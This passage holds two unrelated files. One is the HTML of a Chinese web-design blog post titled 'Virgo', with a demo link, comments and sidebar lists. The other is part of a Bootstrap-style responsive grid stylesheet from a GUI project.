<meta name="apple-mobile-web-app-status-bar-style" content="default">
<meta name="format-detection" content="telephone=no, email=no">
<meta name="theme-color" content="#e0e0e0">
<meta name="msapplication-tap-highlight" content="no">
<meta name="msapplication-TileColor" content="#ffffff">
<meta name="msapplication-TileImage" content="./asset/img/ms-title-144x144.png">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:site" content="@双鱼bizhongbio">
<meta name="twitter:title" content="处女座">
<meta name="twitter:description" content="演示地址:Virgo">
<meta name="twitter:image" content="https://bizhongbio.github.io/article/virgo/virgo.jpg">
<meta property="og:site_name" content="双鱼bizhongbio">
<meta property="og:url" content="https://bizhongbio.github.io/article/virgo/">
<meta property="og:type" content="article">
<meta property="og:title" content="处女座">
<meta property="og:description" content="演示地址:Virgo">
<meta property="og:image" content="https://bizhongbio.github.io/article/virgo/virgo.jpg">
<meta itemprop="name" content="处女座">
<meta itemprop="description" content="演示地址:Virgo">
<meta itemprop="image" content="https://bizhongbio.github.io/article/virgo/virgo.jpg">
<link rel="fluid-icon" href="https://bizhongbio.github.io/asset/img/fluid-icon-512x512.png" title="双鱼bizhongbio">
<link rel="apple-touch-icon" sizes="57x57" href="./asset/img/apple-touch-icon-57x57.png">
<link rel="apple-touch-icon" sizes="60x60" href="./asset/img/apple-touch-icon-60x60.png">
<link rel="apple-touch-icon" sizes="72x72" href="./asset/img/apple-touch-icon-72x72.png">
<link rel="apple-touch-icon" sizes="76x76" href="./asset/img/apple-touch-icon-76x76.png">
<link rel="apple-touch-icon" sizes="114x114" href="./asset/img/apple-touch-icon-114x114.png">
<link rel="apple-touch-icon" sizes="120x120" href="./asset/img/apple-touch-icon-120x120.png">
<link rel="apple-touch-icon" sizes="144x144" href="./asset/img/apple-touch-icon-144x144.png">
<link rel="apple-touch-icon" sizes="152x152" href="./asset/img/apple-touch-icon-152x152.png">
<link rel="apple-touch-icon" sizes="180x180" href="./asset/img/apple-touch-icon-180x180.png">
<link rel="shortcut icon" href="./favicon.ico">
<link rel="icon" sizes="32x32" href="./asset/img/favicon-32x32.png">
<link rel="icon" sizes="192x192" href="./asset/img/android-chrome-192x192.png">
<link rel="icon" sizes="96x96" href="./asset/img/favicon-96x96.png">
<link rel="icon" sizes="16x16" href="./asset/img/favicon-16x16.png">
<link rel="manifest" href="./asset/img/manifest.json">
<link rel="mask-icon" href="./asset/img/safari-pinned-tab.svg" color="#000000">
<link rel="stylesheet" href="./asset/dep/font-awesome/css/font-awesome.min.css">
<link rel="stylesheet" href="./asset/css/bizhongbio.min.css">
<link rel="canonical" href="https://bizhongbio.github.io/article/virgo/">
<!--[if lt IE 9]>
<script src="./asset/dep/html5shiv/html5shiv.min.js"></script>
<script src="./asset/dep/respond/respond.min.js"></script>
<![endif]-->
</head>
<body id="single">
<!--[if lt IE 8]><p id="upgrade-browser-reminder">经年的执念,放下吧。快搭上升级浏览器的末班车。</p><![endif]-->
<header id="header" role="banner">
<div class="header-content">
<a id="btn-nav" href="javascript:void(0);"><i class="fa fa-navicon"></i></a>
<h1 class="logo"><a href="./">双鱼bizhongbio</a></h1>
<nav class="nav" aria-label="Global navigation" role="navigation">
<div class="menu-nav-container">
<ul id="menu-nav" class="menu">
<li><a href="./">首页</a></li>
<li class="current-menu-item"><a href="./article/">文章</a></li>
<li><a href="./project/">项目</a></li>
<li><a href="./work/">作品</a></li>
<li><a href="./video/">视频</a></li>
<li><a href="./about/">关于</a></li>
</ul>
</div>
</nav>
<a id="btn-search" href="javascript:void(0);"><i class="fa fa-search"></i></a>
<form id="searchform" method="get" action="./">
<input id="s" name="s" type="text" value="" placeholder="请输入关键字">
<button class="submit" type="submit"><i class="fa fa-search"></i></button>
</form>
</div>
</header>
<main class="main" role="main">
<div class="content">
<article id="article">
<section class="article-header">
<h1>处女座</h1>
<span><i class="fa fa-calendar-check-o"></i>2014.12.16 18:00</span>
<span><i class="fa fa-user-secret"></i>bizhongbio</span>
<span><i class="fa fa-bookmark"></i><a href="./tag/%e7%bd%91%e9%a1%b5%e8%ae%be%e8%ae%a1/" rel="tag">网页设计</a></span>
<span><i class="fa fa-eye"></i>1394</span>
<span><i class="fa fa-commenting"></i><a href="./article/virgo/index.html#comments">1</a></span>
</section>
<section class="article-content">
<p><a href="./article/virgo/virgo-1.jpg"><img src="./article/virgo/virgo-1.jpg" alt="virgo-1"></a></p>
<p>演示地址:<a href="./demo/virgo/">Virgo</a></p>
</section>
<section class="article-copyright">
<p>感谢你的阅读,本文版权归 <a href="https://bizhongbio.github.io/">双鱼bizhongbio</a> 所有,转载时请注明出处。<br/>注明出处格式:双鱼bizhongbio(<a title="处女座" href="https://bizhongbio.github.io/article/virgo/">https://bizhongbio.github.io/article/virgo/</a>)</p>
</section>
<section class="article-adjacent">
上一篇:<a href="./article/singlepage-web-design/" rel="prev">单页网页设计</a><br/>
下一篇:<a href="./article/paolo-domeniconi-illustration-work/" rel="next">意大利Paolo Domeniconi插画作品</a><br/>
</section>
<section class="article-share">
<h2>分享到</h2>
<div class="bdsharebuttonbox">
<a href="#" class="bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
<a href="#" class="bds_qzone" data-cmd="qzone" title="分享到QQ空间"></a>
<a href="#" class="bds_tqq" data-cmd="tqq" title="分享到腾讯微博"></a>
<a href="#" class="bds_douban" data-cmd="douban" title="分享到豆瓣网"></a>
<a href="#" class="bds_weixin" data-cmd="weixin" title="分享到微信"></a>
<a href="#" class="bds_more" data-cmd="more"></a>
<a class="bds_count"></a>
</div>
<div class="clear"></div>
</section>
<section class="article-related">
<h2>相关文章</h2>
<ul class="related-articles">
<li class="related-article">
<figure>
<a href="./article/new-scuec-sbc/" target="_blank">
<img src="./article/new-scuec-sbc/new-scuec-sbc.jpg" alt="民大设备处改版">
</a>
<figcaption>
<a href="./article/new-scuec-sbc/" title="民大设备处改版" rel="bookmark">民大设备处改版</a>
</figcaption>
</figure>
</li>
<li class="related-article">
<figure>
<a href="./article/10-mistakes-website/" target="_blank">
<img src="./article/10-mistakes-website/10-mistakes-website.jpg" alt="网站看起来不专业的十大设计误区">
</a>
<figcaption>
<a href="./article/10-mistakes-website/" title="网站看起来不专业的十大设计误区" rel="bookmark">网站看起来不专业的十大设计误区</a>
</figcaption>
</figure>
</li>
<li class="related-article">
<figure>
<a href="./article/background-design-trend/" target="_blank">
<img src="./article/background-design-trend/background-design-trend.jpg" alt="大背景底图设计趋势">
</a>
<figcaption>
<a href="./article/background-design-trend/" title="大背景底图设计趋势" rel="bookmark">大背景底图设计趋势</a>
</figcaption>
</figure>
</li>
<li class="related-article">
<figure>
<a href="./article/strange-background-homepage/" target="_blank">
<img src="./article/strange-background-homepage/strange-background-homepage.jpg" alt="诡异的背景首页">
</a>
<figcaption>
<a href="./article/strange-background-homepage/" title="诡异的背景首页" rel="bookmark">诡异的背景首页</a>
</figcaption>
</figure>
</li>
<li class="clear"></li>
</ul>
</section>
<section class="article-comment">
<div class="comments">
<a name="comments"></a>
<h2>1条评论</h2>
<ol class="commentslist">
<li class="comment" id="li-comment-293">
<div class="author-face">太</div>
<div class="comment-content" id="comment-293">太阳
<span class="comment-meta">2016.04.19 00:54</span>
<div class="comment-text">
<p>加油</p>
</div>
</div>
</li>
</ol>
</div>
<div class="respond">
<a name="respond"></a>
<h2>发表评论</h2>
<form class="commentform" name="commentform" action="javascript:void(0);" method="post">
<input id="author" type="text" name="author" tabindex="1" value="" placeholder="姓名(必填)" />
<input id="email" type="text" name="email" tabindex="2" value="" placeholder="Email(必填)" />
<input id="url" type="text" name="url" tabindex="3" value="" placeholder="网站" />
<textarea id="comment" name="comment" tabindex="4" placeholder="说点什么吧"></textarea>
<input id="commentsubmit" type="submit" name="submit" value="发表评论" />
<input type='hidden' name='comment_post_ID' value='170' id='comment_post_ID' />
<input id='comment_parent' type='hidden' name='comment_parent' value='0' />
<input id="comment_mail_notify" name="comment_mail_notify" type="checkbox" value="comment_mail_notify" checked>
<label for="comment_mail_notify">回复时邮件通知我</label>
</form>
</div>
</section>
</article>
<aside class="sidebar">
<article class="promos">
<a href="https://github.com/bizhong" title="bizhong (Bizhong Lan) · GitHub" target="_blank"><i class="fa fa-github"></i> GitHub</a>
</article>
<section class="recommended-posts">
<h2>推荐文章</h2>
<ul>
<li>
<a href="./article/analyse-response-web-design/" title="浅析RWD">浅析RWD</a>
<span><a href="./article/analyse-response-web-design/index.html#comments">评论15</a></span>
</li>
<li>
<a href="./article/css-summary/" title="CSS总结">CSS总结</a>
<span><a href="./article/css-summary/index.html#comments">评论10</a></span>
</li>
<li>
<a href="./article/speed-up-wordpress-website/" title="加速WordPress站点">加速WordPress站点</a>
<span><a href="./article/speed-up-wordpress-website/index.html#comments">评论9</a></span>
</li>
<li>
<a href="./article/nodejs-summary/" title="Node.js概述">Node.js概述</a>
<span><a href="./article/nodejs-summary/index.html#comments">评论8</a></span>
</li>
<li>
<a href="./article/nine-principle-material-design/" title="Material Design的九大设计原则">Material Design的九…</a>
<span><a href="./article/nine-principle-material-design/index.html#comments">评论8</a></span>
</li>
<li>
<a href="./article/second-time-to-see-snow/" title="第二次见到雪">第二次见到雪</a>
<span><a href="./article/second-time-to-see-snow/index.html#comments">评论6</a></span>
</li>
<li>
<a href="./article/zjz-portfolios/" title="章同学作品集">章同学作品集</a>
<span><a href="./article/zjz-portfolios/index.html#comments">评论3</a></span>
</li>
<li>
<a href="./article/background-design-trend/" title="大背景底图设计趋势">大背景底图设计趋势</a>
<span><a href="./article/background-design-trend/index.html#comments">评论3</a></span>
</li>
<li>
<a href="./article/a-word-bless-college-entrance-students/" title="一句话祝福高考生">一句话祝福高考生</a>
<span><a href="./article/a-word-bless-college-entrance-students/index.html#comments">评论3</a></span>
</li>
<li>
<a href="./article/fixed-right-sidebar-scroll-effect/" title="固定右侧边栏滚动特效">固定右侧边栏滚动特效</a>
<span><a href="./article/fixed-right-sidebar-scroll-effect/index.html#comments">评论3</a></span>
</li>
<li>
<a href="./article/hello-world/" title="世界,你好!">世界,你好!</a>
<span><a href="./article/hello-world/index.html#comments">评论3</a></span>
</li>
<li>
<a href="./article/home-scrolling-effects/" title="首页滚动特效">首页滚动特效</a>
<span><a href="./article/home-scrolling-effects/index.html#comments">评论3</a></span>
</li>
<li>
<a href="./article/singlepage-web-design/" title="单页网页设计">单页网页设计</a>
<span><a href="./article/singlepage-web-design/index.html#comments">评论3</a></span>
</li>
<li>
<a href="./article/html-css-code-guide/" title="HTML&CSS编码规范">HTML&CSS编码规范</a>
<span><a href="./article/html-css-code-guide/index.html#comments">评论3</a></span>
</li>
<li>
<a href="./article/strange-background-homepage/" title="诡异的背景首页">诡异的背景首页</a>
<span><a href="./article/strange-background-homepage/index.html#comments">评论3</a></span>
</li>
<li>
<a href="./article/jquery-slides/" title="jQuery图片轮播">jQuery图片轮播</a>
<span><a href="./article/jquery-slides/index.html#comments">评论2</a></span>
</li>
</ul>
</section>
<section class="recent-comments">
<h2>近期评论</h2>
<li>
<div class="comment-author">B</div>
<div class="comment-main">
<a href="./article/a-word-bless-college-entrance-students/index.html#comment-452">Bell</a>
<p>This website very nice, I liked it!</p>
</div>
</li>
<li>
<div class="comment-author">达</div>
<div class="comment-main">
<a href="./article/nodejs-summary/index.html#comment-441">达达</a>
<p>你的博客就像冬天里的一把火!</p>
</div>
</li>
<li>
<div class="comment-author">游</div>
<div class="comment-main">
<a href="./article/nodejs-summary/index.html#comment-434">游客</a>
<p>访问您的博客已成习惯!</p>
</div>
</li>
<li>
<div class="comment-author">访</div>
<div class="comment-main">
<a href="./article/nodejs-summary/index.html#comment-433">访客</a>
<p>学习带来乐趣,谢谢博主!</p>
</div>
</li>
<li>
<div class="comment-author">娜</div>
<div class="comment-main">
<a href="./article/nodejs-summary/index.html#comment-429">娜娜</a>
<p>来看看,学习学习!!</p>
</div>
</li>
<li>
<div class="comment-author">亚</div>
<div class="comment-main">
<a href="./article/second-time-to-see-snow/index.html#comment-418">亚洲</a>
<p>博客不错,主题挺漂亮的。</p>
</div>
</li>
<li>
<div class="comment-author">达</div>
<div class="comment-main">
<a href="./article/nodejs-summary/index.html#comment-406">达达</a>
<p>偶然来访,受益良多!</p>
</div>
</li>
<li>
<div class="comment-author">尚</div>
<div class="comment-main">
<a href="./article/nodejs-summary/index.html#comment-397">尚先生</a>
<p>感觉很不错的样子!</p>
</div>
</li>
<li>
<div class="comment-author">小</div>
<div class="comment-main">
<a href="./article/nodejs-summary/index.html#comment-395">小米</a>
<p>随便看看,随便转转!</p>
</div>
</li>
<li>
<div class="comment-author">娜</div>
<div class="comment-main">
<a href="./article/nodejs-summary/index.html#comment-394">娜娜</a>
<p>风吹过,我来过!</p>
</div>
</li>
</section>
</aside>
<div class="clear"></div>
</div>
</main>
<footer class="footer" role="contentinfo">
<div class="footer-content">
<aside class="link">
<h2>友情链接</h2>
<ul>
<li><a href="http://www.new-thread.com/" title="新思路团队网站 - NewThread" target="_blank">新思路团队网站 - NewThread</a></li>
<li><a href="http://www.xuanfengge.com/" title="轩枫阁 – 前端开发 | web前端技术博客" target="_blank">轩枫阁</a></li>
<li><a href="http://www.niices.com/" title="蓝色栗子" target="_blank">蓝色栗子</a></li>
<li><a href="http://www.petite-dd.com/" title="petite-dd丨文艺的聚集地" target="_blank">petite-dd丨文艺的聚集地</a></li>
<li><a href="http://greenfavo.com/" title="greenfavo-前端学习笔记" target="_blank">greenfavo-前端学习笔记</a></li>
<li><a href="http://www.shuliqiyzs.com/" title="叮当猫~~前端爱好者" target="_blank">叮当猫~~前端爱好者</a></li>
<li><a href="http://www.h-five.com/" title="默识者" target="_blank">默识者</a></li>
</ul>
<div class="clear"></div>
</aside>
<section class="copyright">
<p>© 2014-<script>document.write((new Date()).getFullYear());</script> <a href="./">双鱼bizhongbio</a> <a href="./sitemap.html" target="_blank">网站地图</a></p>
</section>
</div>
<a id="go-top" href="javascript:scroll(0,0);"><i class="fa fa-long-arrow-up"></i></a>
</footer>
<script src="./asset/dep/jquery/jquery-3.1.1.min.js"></script>
<script src="./asset/js/bizhongbio.min.js"></script>
<script>window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"1","bdSize":"24"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];</script>
</body>
</html>
|
docs/icons-group16/2.0.1/tests/WBG/assets/css/gui.css | WestpacCXTeam/GUI-source | /*! _colors v2.0.2 */
/*
* SETTINGS
*/
/*! _fonts v2.0.2 */
/*
* SETTINGS
*/
/*
* SETTINGS
*/
.body-font {
font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif;
}
.brand-font {
font-family: "Times New Roman", "Times", -apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif;
}
/*! _grid v2.0.0 */
.clearfix:before,
.clearfix:after,
.container-fluid:before,
.container-fluid:after,
.container:before,
.container:after,
.row:before,
.row:after {
content: " ";
display: table;
}
.clearfix:after,
.container-fluid:after,
.container:after,
.row:after {
clear: both;
}
*,
*:after,
*:before {
box-sizing: border-box;
}
.container,
.container-fluid {
margin-right: auto;
margin-left: auto;
padding-left: 12px;
padding-right: 12px;
}
@media (min-width: 768px) {
.container {
padding-left: 12px;
padding-right: 12px;
}
}
@media (min-width: 992px) {
.container {
padding-left: 12px;
padding-right: 12px;
}
}
@media (min-width: 1200px) {
.container {
padding-left: 12px;
padding-right: 12px;
}
}
@media (min-width: 768px) {
.container {
width: 744px;
}
}
@media (min-width: 992px) {
.container {
width: 960px;
}
}
@media (min-width: 1200px) {
.container {
width: 1164px;
}
}
@media (min-width: 768px) {
.container-fluid {
padding-left: 12px;
padding-right: 12px;
}
}
@media (min-width: 992px) {
.container-fluid {
padding-left: 12px;
padding-right: 12px;
}
}
@media (min-width: 1200px) {
.container-fluid {
padding-left: 12px;
padding-right: 12px;
}
}
.row {
margin-left: -6px;
margin-right: -6px;
}
@media (min-width: 768px) {
.row {
margin-left: -12px;
margin-right: -12px;
}
}
@media (min-width: 992px) {
.row {
margin-left: -12px;
margin-right: -12px;
}
}
@media (min-width: 1200px) {
.row {
margin-left: -12px;
margin-right: -12px;
}
}
.col-lg-1,
.col-lg-10,
.col-lg-11,
.col-lg-12,
.col-lg-2,
.col-lg-3,
.col-lg-4,
.col-lg-5,
.col-lg-6,
.col-lg-7,
.col-lg-8,
.col-lg-9,
.col-md-1,
.col-md-10,
.col-md-11,
.col-md-12,
.col-md-2,
.col-md-3,
.col-md-4,
.col-md-5,
.col-md-6,
.col-md-7,
.col-md-8,
.col-md-9,
.col-sm-1,
.col-sm-10,
.col-sm-11,
.col-sm-12,
.col-sm-2,
.col-sm-3,
.col-sm-4,
.col-sm-5,
.col-sm-6,
.col-sm-7,
.col-sm-8,
.col-sm-9,
.col-xs-1,
.col-xs-10,
.col-xs-11,
.col-xs-12,
.col-xs-2,
.col-xs-3,
.col-xs-4,
.col-xs-5,
.col-xs-6,
.col-xs-7,
.col-xs-8,
.col-xs-9 {
position: relative;
min-height: 1px;
padding-left: 6px;
padding-right: 6px;
}
@media (min-width: 768px) {
.col-lg-1,
.col-lg-10,
.col-lg-11,
.col-lg-12,
.col-lg-2,
.col-lg-3,
.col-lg-4,
.col-lg-5,
.col-lg-6,
.col-lg-7,
.col-lg-8,
.col-lg-9,
.col-md-1,
.col-md-10,
.col-md-11,
.col-md-12,
.col-md-2,
.col-md-3,
.col-md-4,
.col-md-5,
.col-md-6,
.col-md-7,
.col-md-8,
.col-md-9,
.col-sm-1,
.col-sm-10,
.col-sm-11,
.col-sm-12,
.col-sm-2,
.col-sm-3,
.col-sm-4,
.col-sm-5,
.col-sm-6,
.col-sm-7,
.col-sm-8,
.col-sm-9,
.col-xs-1,
.col-xs-10,
.col-xs-11,
.col-xs-12,
.col-xs-2,
.col-xs-3,
.col-xs-4,
.col-xs-5,
.col-xs-6,
.col-xs-7,
.col-xs-8,
.col-xs-9 {
padding-left: 12px;
padding-right: 12px;
}
}
@media (min-width: 992px) {
.col-lg-1,
.col-lg-10,
.col-lg-11,
.col-lg-12,
.col-lg-2,
.col-lg-3,
.col-lg-4,
.col-lg-5,
.col-lg-6,
.col-lg-7,
.col-lg-8,
.col-lg-9,
.col-md-1,
.col-md-10,
.col-md-11,
.col-md-12,
.col-md-2,
.col-md-3,
.col-md-4,
.col-md-5,
.col-md-6,
.col-md-7,
.col-md-8,
.col-md-9,
.col-sm-1,
.col-sm-10,
.col-sm-11,
.col-sm-12,
.col-sm-2,
.col-sm-3,
.col-sm-4,
.col-sm-5,
.col-sm-6,
.col-sm-7,
.col-sm-8,
.col-sm-9,
.col-xs-1,
.col-xs-10,
.col-xs-11,
.col-xs-12,
.col-xs-2,
.col-xs-3,
.col-xs-4,
.col-xs-5,
.col-xs-6,
.col-xs-7,
.col-xs-8,
.col-xs-9 {
padding-left: 12px;
padding-right: 12px;
}
}
@media (min-width: 1200px) {
.col-lg-1,
.col-lg-10,
.col-lg-11,
.col-lg-12,
.col-lg-2,
.col-lg-3,
.col-lg-4,
.col-lg-5,
.col-lg-6,
.col-lg-7,
.col-lg-8,
.col-lg-9,
.col-md-1,
.col-md-10,
.col-md-11,
.col-md-12,
.col-md-2,
.col-md-3,
.col-md-4,
.col-md-5,
.col-md-6,
.col-md-7,
.col-md-8,
.col-md-9,
.col-sm-1,
.col-sm-10,
.col-sm-11,
.col-sm-12,
.col-sm-2,
.col-sm-3,
.col-sm-4,
.col-sm-5,
.col-sm-6,
.col-sm-7,
.col-sm-8,
.col-sm-9,
.col-xs-1,
.col-xs-10,
.col-xs-11,
.col-xs-12,
.col-xs-2,
.col-xs-3,
.col-xs-4,
.col-xs-5,
.col-xs-6,
.col-xs-7,
.col-xs-8,
.col-xs-9 {
padding-left: 12px;
padding-right: 12px;
}
}
.col-xs-1,
.col-xs-10,
.col-xs-11,
.col-xs-12,
.col-xs-2,
.col-xs-3,
.col-xs-4,
.col-xs-5,
.col-xs-6,
.col-xs-7,
.col-xs-8,
.col-xs-9 {
float: left;
}
.col-xs-12 {
width: 100%;
}
.col-xs-11 {
width: 91.66666667%;
}
.col-xs-10 {
width: 83.33333333%;
}
.col-xs-9 {
width: 75%;
}
.col-xs-8 {
width: 66.66666667%;
}
.col-xs-7 {
width: 58.33333333%;
}
.col-xs-6 {
width: 50%;
}
.col-xs-5 {
width: 41.66666667%;
}
.col-xs-4 {
width: 33.33333333%;
}
.col-xs-3 {
width: 25%;
}
.col-xs-2 {
width: 16.66666667%;
}
.col-xs-1 {
width: 8.33333333%;
}
.col-xs-pull-12 {
right: 100%;
}
.col-xs-pull-11 {
right: 91.66666667%;
}
.col-xs-pull-10 {
right: 83.33333333%;
}
.col-xs-pull-9 {
right: 75%;
}
.col-xs-pull-8 {
right: 66.66666667%;
}
.col-xs-pull-7 {
right: 58.33333333%;
}
.col-xs-pull-6 {
right: 50%;
}
.col-xs-pull-5 {
right: 41.66666667%;
}
.col-xs-pull-4 {
right: 33.33333333%;
}
.col-xs-pull-3 {
right: 25%;
}
.col-xs-pull-2 {
right: 16.66666667%;
}
.col-xs-pull-1 {
right: 8.33333333%;
}
.col-xs-pull-0 {
right: auto;
}
.col-xs-push-12 {
left: 100%;
}
.col-xs-push-11 {
left: 91.66666667%;
}
.col-xs-push-10 {
left: 83.33333333%;
}
.col-xs-push-9 {
left: 75%;
}
.col-xs-push-8 {
left: 66.66666667%;
}
.col-xs-push-7 {
left: 58.33333333%;
}
.col-xs-push-6 {
left: 50%;
}
.col-xs-push-5 {
left: 41.66666667%;
}
.col-xs-push-4 {
left: 33.33333333%;
}
.col-xs-push-3 {
left: 25%;
}
.col-xs-push-2 {
left: 16.66666667%;
}
.col-xs-push-1 {
left: 8.33333333%;
}
.col-xs-push-0 {
left: auto;
}
.col-xs-offset-12 {
margin-left: 100%;
}
.col-xs-offset-11 {
margin-left: 91.66666667%;
}
.col-xs-offset-10 {
margin-left: 83.33333333%;
}
.col-xs-offset-9 {
margin-left: 75%;
}
.col-xs-offset-8 {
margin-left: 66.66666667%;
}
.col-xs-offset-7 {
margin-left: 58.33333333%;
}
.col-xs-offset-6 {
margin-left: 50%;
}
.col-xs-offset-5 {
margin-left: 41.66666667%;
}
.col-xs-offset-4 {
margin-left: 33.33333333%;
}
.col-xs-offset-3 {
margin-left: 25%;
}
.col-xs-offset-2 {
margin-left: 16.66666667%;
}
.col-xs-offset-1 {
margin-left: 8.33333333%;
}
.col-xs-offset-0 {
margin-left: 0;
}
@media (min-width: 768px) {
.col-sm-1,
.col-sm-10,
.col-sm-11,
.col-sm-12,
.col-sm-2,
.col-sm-3,
.col-sm-4,
.col-sm-5,
.col-sm-6,
.col-sm-7,
.col-sm-8,
.col-sm-9 {
float: left;
}
.col-sm-12 {
width: 100%;
}
.col-sm-11 {
width: 91.66666667%;
}
.col-sm-10 {
width: 83.33333333%;
}
.col-sm-9 {
width: 75%;
}
.col-sm-8 {
width: 66.66666667%;
}
.col-sm-7 {
width: 58.33333333%;
}
.col-sm-6 {
width: 50%;
}
.col-sm-5 {
width: 41.66666667%;
}
.col-sm-4 {
width: 33.33333333%;
}
.col-sm-3 {
width: 25%;
}
.col-sm-2 {
width: 16.66666667%;
}
.col-sm-1 {
width: 8.33333333%;
}
.col-sm-pull-12 {
right: 100%;
}
.col-sm-pull-11 {
right: 91.66666667%;
}
.col-sm-pull-10 {
right: 83.33333333%;
}
.col-sm-pull-9 {
right: 75%;
}
.col-sm-pull-8 {
right: 66.66666667%;
}
.col-sm-pull-7 {
right: 58.33333333%;
}
.col-sm-pull-6 {
right: 50%;
}
.col-sm-pull-5 {
right: 41.66666667%;
}
.col-sm-pull-4 {
right: 33.33333333%;
}
.col-sm-pull-3 {
right: 25%;
}
.col-sm-pull-2 {
right: 16.66666667%;
}
.col-sm-pull-1 {
right: 8.33333333%;
}
.col-sm-pull-0 {
right: auto;
}
.col-sm-push-12 {
left: 100%;
}
.col-sm-push-11 {
left: 91.66666667%;
}
.col-sm-push-10 {
left: 83.33333333%;
}
.col-sm-push-9 {
left: 75%;
}
.col-sm-push-8 {
left: 66.66666667%;
}
.col-sm-push-7 {
left: 58.33333333%;
}
.col-sm-push-6 {
left: 50%;
}
.col-sm-push-5 {
left: 41.66666667%;
}
.col-sm-push-4 {
left: 33.33333333%;
}
.col-sm-push-3 {
left: 25%;
}
.col-sm-push-2 {
left: 16.66666667%;
}
.col-sm-push-1 {
left: 8.33333333%;
}
.col-sm-push-0 {
left: auto;
}
.col-sm-offset-12 {
margin-left: 100%;
}
.col-sm-offset-11 {
margin-left: 91.66666667%;
}
.col-sm-offset-10 {
margin-left: 83.33333333%;
}
.col-sm-offset-9 {
margin-left: 75%;
}
.col-sm-offset-8 {
margin-left: 66.66666667%;
}
.col-sm-offset-7 {
margin-left: 58.33333333%;
}
.col-sm-offset-6 {
margin-left: 50%;
}
.col-sm-offset-5 {
margin-left: 41.66666667%;
}
.col-sm-offset-4 {
margin-left: 33.33333333%;
}
.col-sm-offset-3 {
margin-left: 25%;
}
.col-sm-offset-2 {
margin-left: 16.66666667%;
}
.col-sm-offset-1 {
margin-left: 8.33333333%;
}
.col-sm-offset-0 {
margin-left: 0;
}
}
@media (min-width: 992px) {
.col-md-1,
.col-md-10,
.col-md-11,
.col-md-12,
.col-md-2,
.col-md-3,
.col-md-4,
.col-md-5,
.col-md-6,
.col-md-7,
.col-md-8,
.col-md-9 {
float: left;
}
.col-md-12 {
width: 100%;
}
.col-md-11 {
width: 91.66666667%;
}
.col-md-10 {
width: 83.33333333%;
}
.col-md-9 {
width: 75%;
}
.col-md-8 {
width: 66.66666667%;
}
.col-md-7 {
width: 58.33333333%;
}
.col-md-6 {
width: 50%;
}
.col-md-5 {
width: 41.66666667%;
}
.col-md-4 {
width: 33.33333333%;
}
.col-md-3 {
width: 25%;
}
.col-md-2 {
width: 16.66666667%;
}
.col-md-1 {
width: 8.33333333%;
}
.col-md-pull-12 {
right: 100%;
}
.col-md-pull-11 {
right: 91.66666667%;
}
.col-md-pull-10 {
right: 83.33333333%;
}
.col-md-pull-9 {
right: 75%;
}
.col-md-pull-8 {
right: 66.66666667%;
}
.col-md-pull-7 {
right: 58.33333333%;
}
.col-md-pull-6 {
right: 50%;
}
.col-md-pull-5 {
right: 41.66666667%;
}
.col-md-pull-4 {
right: 33.33333333%;
}
.col-md-pull-3 {
right: 25%;
}
.col-md-pull-2 {
right: 16.66666667%;
}
.col-md-pull-1 {
right: 8.33333333%;
}
.col-md-pull-0 {
right: auto;
}
.col-md-push-12 {
left: 100%;
}
.col-md-push-11 {
left: 91.66666667%;
}
.col-md-push-10 {
left: 83.33333333%;
}
.col-md-push-9 {
left: 75%;
}
.col-md-push-8 {
left: 66.66666667%;
}
.col-md-push-7 {
left: 58.33333333%;
}
.col-md-push-6 {
left: 50%;
}
.col-md-push-5 {
left: 41.66666667%;
}
.col-md-push-4 {
left: 33.33333333%;
}
.col-md-push-3 {
left: 25%;
}
.col-md-push-2 {
left: 16.66666667%;
}
.col-md-push-1 {
left: 8.33333333%;
}
.col-md-push-0 {
left: auto;
}
.col-md-offset-12 {
margin-left: 100%;
}
.col-md-offset-11 {
margin-left: 91.66666667%;
}
.col-md-offset-10 {
margin-left: 83.33333333%;
}
.col-md-offset-9 {
margin-left: 75%;
}
.col-md-offset-8 {
margin-left: 66.66666667%;
}
.col-md-offset-7 {
margin-left: 58.33333333%;
}
.col-md-offset-6 {
margin-left: 50%;
}
.col-md-offset-5 {
margin-left: 41.66666667%;
}
.col-md-offset-4 {
margin-left: 33.33333333%;
}
.col-md-offset-3 {
margin-left: 25%;
}
.col-md-offset-2 {
margin-left: 16.66666667%;
}
.col-md-offset-1 {
margin-left: 8.33333333%;
}
.col-md-offset-0 {
margin-left: 0;
}
}
@media (min-width: 1200px) {
.col-lg-1,
.col-lg-10,
.col-lg-11,
.col-lg-12,
.col-lg-2,
.col-lg-3,
.col-lg-4,
.col-lg-5,
.col-lg-6,
.col-lg-7,
.col-lg-8,
.col-lg-9 {
float: left;
}
.col-lg-12 {
width: 100%;
}
.col-lg-11 {
width: 91.66666667%;
}
.col-lg-10 {
width: 83.33333333%;
}
.col-lg-9 {
width: 75%;
}
.col-lg-8 {
width: 66.66666667%;
}
.col-lg-7 {
width: 58.33333333%;
}
.col-lg-6 {
width: 50%;
}
.col-lg-5 {
width: 41.66666667%;
}
.col-lg-4 {
width: 33.33333333%;
}
.col-lg-3 {
width: 25%;
}
.col-lg-2 {
width: 16.66666667%;
}
.col-lg-1 {
width: 8.33333333%;
}
.col-lg-pull-12 {
right: 100%;
}
.col-lg-pull-11 {
right: 91.66666667%;
}
.col-lg-pull-10 {
right: 83.33333333%;
}
.col-lg-pull-9 {
right: 75%;
}
.col-lg-pull-8 {
right: 66.66666667%;
}
.col-lg-pull-7 {
right: 58.33333333%;
}
.col-lg-pull-6 {
right: 50%;
}
.col-lg-pull-5 {
right: 41.66666667%;
}
.col-lg-pull-4 {
right: 33.33333333%;
}
.col-lg-pull-3 {
right: 25%;
}
.col-lg-pull-2 {
right: 16.66666667%;
}
.col-lg-pull-1 {
right: 8.33333333%;
}
.col-lg-pull-0 {
right: auto;
}
.col-lg-push-12 {
left: 100%;
}
.col-lg-push-11 {
left: 91.66666667%;
}
.col-lg-push-10 {
left: 83.33333333%;
}
.col-lg-push-9 {
left: 75%;
}
.col-lg-push-8 {
left: 66.66666667%;
}
